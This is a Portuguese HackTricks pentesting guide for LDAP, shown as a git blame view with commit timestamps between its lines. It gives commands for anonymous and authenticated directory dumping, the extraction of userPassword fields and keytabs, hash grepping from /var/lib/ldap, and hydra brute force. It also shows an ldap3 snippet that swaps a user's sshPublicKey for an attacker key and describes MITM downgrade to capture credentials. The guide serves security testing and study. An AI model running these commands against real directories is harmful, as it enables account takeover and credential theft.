hacktricks/network-services-pentesting/pentesting-ldap.md

386 lines
17 KiB
Markdown
Raw Normal View History

# 389, 636, 3268, 3269 - Pentesting LDAP
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
O uso do **LDAP** (Protocolo de Acesso a Diretórios Leves) é principalmente para localizar várias entidades, como organizações, indivíduos e recursos como arquivos e dispositivos dentro de redes, tanto públicas quanto privadas. Ele oferece uma abordagem simplificada em comparação com seu antecessor, DAP, por ter uma pegada de código menor.
Os diretórios LDAP são estruturados para permitir sua distribuição em vários servidores, sendo que cada servidor abriga uma versão **replicada** e **sincronizada** do diretório, chamada de Agente de Sistema de Diretório (DSA). A responsabilidade de lidar com solicitações cabe inteiramente ao servidor LDAP, que pode se comunicar com outros DSAs conforme necessário para fornecer uma resposta unificada ao solicitante.
A organização do diretório LDAP se assemelha a uma **hierarquia de árvore, começando com o diretório raiz no topo**. Isso se ramifica para países, que se dividem em organizações e, em seguida, em unidades organizacionais representando várias divisões ou departamentos, chegando finalmente ao nível de entidades individuais, incluindo pessoas e recursos compartilhados como arquivos e impressoras.
**Porta padrão:** 389 e 636 (ldaps). O Catálogo Global (LDAP no Active Directory) está disponível por padrão nas portas 3268 e 3269 para LDAPS.
```
PORT STATE SERVICE REASON
389/tcp open ldap syn-ack
636/tcp open tcpwrapped
```
2023-06-06 18:56:34 +00:00
### Formato de Intercâmbio de Dados LDAP
LDIF (Formato de Intercâmbio de Dados LDAP) define o conteúdo do diretório como um conjunto de registros. Também pode representar solicitações de atualização (Adicionar, Modificar, Excluir, Renomear).
```bash
dn: dc=local
dc: local
objectClass: dcObject
dn: dc=moneycorp,dc=local
dc: moneycorp
objectClass: dcObject
objectClass: organization
dn ou=it,dc=moneycorp,dc=local
objectClass: organizationalUnit
ou: dev
dn: ou=marketing,dc=moneycorp,dc=local
objectClass: organizationalUnit
Ou: sales
dn: cn= ,ou= ,dc=moneycorp,dc=local
objectClass: personalData
cn:
sn:
gn:
uid:
ou:
mail: pepe@hacktricks.xyz
phone: 23627387495
```
* As linhas 1-3 definem o domínio de nível superior local
* As linhas 5-8 definem o domínio de primeiro nível moneycorp (moneycorp.local)
* As linhas 10-16 definem 2 unidades organizacionais: dev e sales
* As linhas 18-26 criam um objeto do domínio e atribuem atributos com valores
2023-06-06 18:56:34 +00:00
## Escrever dados
Observe que se você puder modificar os valores, poderá realizar ações realmente interessantes. Por exemplo, imagine que **pode alterar as informações de "sshPublicKey"** do seu usuário ou de qualquer usuário. É altamente provável que se esse atributo existir, então **o ssh está lendo as chaves públicas do LDAP**. Se você puder modificar a chave pública de um usuário, **poderá fazer login como esse usuário mesmo que a autenticação por senha não esteja habilitada no ssh**.
```bash
# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
>>> import ldap3
2022-10-05 21:51:12 +00:00
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
>>> connection.bind()
True
2022-10-05 21:51:12 +00:00
>>> connection.extend.standard.who_am_i()
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
```
## Capturar credenciais em texto claro
2022-10-05 21:51:12 +00:00
Se o LDAP é usado sem SSL, você pode **capturar credenciais em texto plano** na rede.
2022-10-05 21:51:12 +00:00
Além disso, você pode realizar um ataque **MITM** na rede **entre o servidor LDAP e o cliente**. Aqui você pode fazer um **Ataque de Degradação** para que o cliente use as **credenciais em texto claro** para fazer login.
2022-10-05 21:51:12 +00:00
**Se o SSL é usado**, você pode tentar fazer um **MITM** como mencionado acima, mas oferecendo um **certificado falso**, se o **usuário aceitar**, você é capaz de degradar o método de autenticação e ver as credenciais novamente.
2022-10-05 21:51:12 +00:00
## Acesso Anônimo
2022-10-05 21:51:12 +00:00
### Bypass na verificação do TLS SNI
De acordo com [**este artigo**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/), apenas acessando o servidor LDAP com um nome de domínio arbitrário (como empresa.com), ele foi capaz de contatar o serviço LDAP e extrair informações como um usuário anônimo:
```bash
2022-10-05 21:51:12 +00:00
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
```
### Ligações anônimas LDAP
As [ligações anônimas LDAP](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) permitem que **atacantes não autenticados** recuperem informações do domínio, como uma listagem completa de usuários, grupos, computadores, atributos de contas de usuário e a política de senha do domínio. Esta é uma **configuração legada**, e a partir do Windows Server 2003, apenas usuários autenticados têm permissão para iniciar solicitações LDAP.\
No entanto, os administradores podem ter precisado **configurar um aplicativo específico para permitir ligações anônimas** e concedido mais acesso do que o pretendido, dando assim acesso a usuários não autenticados a todos os objetos no AD.
2022-10-05 21:51:12 +00:00
## Credenciais Válidas
2022-10-05 21:51:12 +00:00
Se você tiver credenciais válidas para fazer login no servidor LDAP, você pode extrair todas as informações sobre o Administrador de Domínio usando:
2022-10-05 21:51:12 +00:00
[ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
2022-10-05 00:11:28 +00:00
```bash
pip3 install ldapdomaindump
2022-10-05 21:51:12 +00:00
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
2022-10-05 00:11:28 +00:00
```
### [Brute Force](../generic-methodologies-and-resources/brute-force.md#ldap)
2022-10-04 23:49:59 +00:00
2023-06-06 18:56:34 +00:00
## Enumeração
2022-10-04 23:49:59 +00:00
### Automatizado
2022-10-04 23:49:59 +00:00
Usando isso, você será capaz de ver a **informação pública** (como o nome do domínio)**:**
2022-10-04 23:49:59 +00:00
```bash
nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
```
2022-10-05 21:51:12 +00:00
### Python
2022-10-04 23:49:59 +00:00
2022-10-05 21:51:12 +00:00
<details>
<summary>Ver enumeração LDAP com python</summary>
2022-10-05 21:51:12 +00:00
2023-06-06 18:56:34 +00:00
Você pode tentar **enumerar um LDAP com ou sem credenciais usando python**: `pip3 install ldap3`
2022-10-04 23:49:59 +00:00
2023-06-06 18:56:34 +00:00
Primeiro tente **conectar sem** credenciais:
2022-10-04 23:49:59 +00:00
```bash
>>> import ldap3
2022-10-05 21:51:12 +00:00
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
2022-10-04 23:49:59 +00:00
>>> connection.bind()
True
2022-10-05 21:51:12 +00:00
>>> server.info
2022-10-04 23:49:59 +00:00
```
Se a resposta for `True`, como no exemplo anterior, você pode obter alguns **dados interessantes** do servidor LDAP (como o **contexto de nomeação** ou **nome de domínio**) a partir de:
2022-10-05 21:51:12 +00:00
```bash
>>> server.info
DSA info (from DSE):
Supported LDAP versions: 3
Naming contexts:
2022-10-05 21:51:12 +00:00
dc=DOMAIN,dc=DOMAIN
```
Uma vez que você tenha o contexto de nomeação, você pode fazer algumas consultas mais emocionantes. Esta consulta simples deve mostrar todos os objetos no diretório:
2022-10-05 21:51:12 +00:00
```bash
>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
True
>> connection.entries
```
Ou **despeje** todo o ldap:
2022-10-04 23:49:59 +00:00
```bash
2022-10-05 21:51:12 +00:00
>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
True
>>> connection.entries
2022-10-04 23:49:59 +00:00
```
2022-10-05 21:51:12 +00:00
</details>
2022-10-04 23:49:59 +00:00
2022-10-05 21:51:12 +00:00
### windapsearch
2022-10-04 23:49:59 +00:00
[**Windapsearch**](https://github.com/ropnop/windapsearch) é um script em Python útil para **enumerar usuários, grupos e computadores de um** domínio Windows utilizando consultas LDAP.
2022-10-04 23:49:59 +00:00
```bash
2022-10-05 21:51:12 +00:00
# Get computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
# Get groups
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
# Get users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Domain Admins
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Privileged Users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users
2022-10-04 23:49:59 +00:00
```
2022-10-05 21:51:12 +00:00
### ldapsearch
Verifique credenciais nulas ou se suas credenciais são válidas:
```bash
2022-07-13 14:08:05 +00:00
ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
```
```bash
2022-05-01 12:49:36 +00:00
# CREDENTIALS NOT VALID RESPONSE
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839
```
Se você encontrar algo dizendo que o "_bind deve ser concluído_", significa que as credenciais estão incorretas.
2023-06-06 18:56:34 +00:00
Você pode extrair **tudo de um domínio** usando:
```bash
2022-07-13 14:08:05 +00:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
2022-07-13 14:08:05 +00:00
-H LDAP Server
-D My User
-w My password
-b Base site, all data from here will be given
```
2023-06-06 18:56:34 +00:00
Extrair **usuários**:
```bash
2022-07-13 14:08:05 +00:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"
```
Extrair **computadores**:
```bash
2022-07-13 14:08:05 +00:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Extrair **minhas informações**:
```bash
2022-07-13 14:08:05 +00:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Extrair **Domain Admins**:
```bash
2022-07-13 14:08:05 +00:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
2023-06-06 18:56:34 +00:00
Extrair **Usuários do Domínio**:
```bash
2022-07-13 14:08:05 +00:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Extrair **Enterprise Admins**:
```bash
2022-07-13 14:08:05 +00:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Extrair **Administradores**:
```bash
2022-07-13 14:08:05 +00:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
2023-06-06 18:56:34 +00:00
Extrair **Grupo de Área de Trabalho Remota**:
```bash
2022-07-13 14:08:05 +00:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Para verificar se você tem acesso a alguma senha, você pode usar o comando grep após executar uma das consultas:
```bash
<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"
```
2022-05-01 13:25:53 +00:00
#### pbis
Você pode baixar **pbis** daqui: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) e geralmente é instalado em `/opt/pbis`.\
**Pbis** permite que você obtenha informações básicas facilmente:
```bash
2021-01-19 17:57:39 +00:00
#Read keytab file
./klist -k /etc/krb5.keytab
#Get known domains info
./get-status
./lsa get-status
#Get basic metrics
./get-metrics
./lsa get-metrics
#Get users
./enum-users
./lsa enum-users
#Get groups
./enum-groups
./lsa enum-groups
#Get all kind of objects
./enum-objects
./lsa enum-objects
#Get groups of a user
./list-groups-for-user <username>
./lsa list-groups-for-user <username>
2021-01-06 00:15:17 +00:00
#Get groups of each user
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
#Get users of a group
./enum-members --by-name "domain admins"
./lsa enum-members --by-name "domain admins"
2021-01-06 00:15:17 +00:00
#Get users of each group
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
#Get description of each user
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
echo "$line";
./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
echo "======================"
done
```
2023-06-06 18:56:34 +00:00
## Interface Gráfica
2022-05-01 13:25:53 +00:00
### Apache Directory
2020-09-13 20:20:14 +00:00
[**Baixe o Apache Directory aqui**](https://directory.apache.org/studio/download/download-linux.html). Você pode encontrar um [exemplo de como usar essa ferramenta aqui](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s).
2020-09-13 20:20:14 +00:00
2022-05-01 13:25:53 +00:00
### jxplorer
2020-09-13 20:20:14 +00:00
2023-06-06 18:56:34 +00:00
Você pode baixar uma interface gráfica com servidor LDAP aqui: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html)
Por padrão, ele é instalado em: _/opt/jxplorer_
![](<../.gitbook/assets/image (482).png>)
### Godap
Você pode acessá-lo em [https://github.com/Macmod/godap](https://github.com/Macmod/godap)
2023-06-06 18:56:34 +00:00
## Autenticação via kerberos
Usando `ldapsearch` você pode **autenticar** contra **kerberos em vez** de via **NTLM** usando o parâmetro `-Y GSSAPI`
2022-05-01 13:25:53 +00:00
## POST
Se você puder acessar os arquivos onde os bancos de dados estão contidos (pode estar em _/var/lib/ldap_). Você pode extrair os hashes usando:
```bash
cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u
```
2023-06-06 18:56:34 +00:00
### Arquivos de Configuração
2023-06-06 18:56:34 +00:00
* Geral
* containers.ldif
* ldap.cfg
* ldap.conf
* ldap.xml
* ldap-config.xml
* ldap-realm.xml
* slapd.conf
2023-06-06 18:56:34 +00:00
* Servidor IBM SecureWay V3
* V3.sas.oc
2023-06-06 18:56:34 +00:00
* Servidor Microsoft Active Directory
* msadClassesAttrs.ldif
* Servidor Netscape Directory Server 4
* nsslapd.sas\_at.conf
* nsslapd.sas\_oc.conf
2023-06-06 18:56:34 +00:00
* Servidor de diretório OpenLDAP
* slapd.sas\_at.conf
* slapd.sas\_oc.conf
* Servidor Sun ONE Directory Server 5.1
* 75sas.ldif
## Comandos Automáticos do HackTricks
```
2021-08-12 13:06:00 +00:00
Protocol_Name: LDAP #Protocol Abbreviation if there is one.
Port_Number: 389,636 #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol #Protocol Abbreviation Spelled out
2021-08-15 17:52:05 +00:00
Entry_1:
Name: Notes
Description: Notes for LDAP
Note: |
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.
2021-08-15 17:52:05 +00:00
https://book.hacktricks.xyz/pentesting/pentesting-ldap
2021-08-15 17:52:05 +00:00
Entry_2:
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}
2021-08-15 17:52:05 +00:00
Entry_3:
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x
2021-08-15 17:52:05 +00:00
Entry_4:
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts
2021-08-15 17:52:05 +00:00
Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"
2021-09-13 15:45:07 +00:00
Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
2021-08-12 13:06:00 +00:00
```
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
2022-04-28 16:01:33 +00:00
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
2022-04-28 16:01:33 +00:00
</details>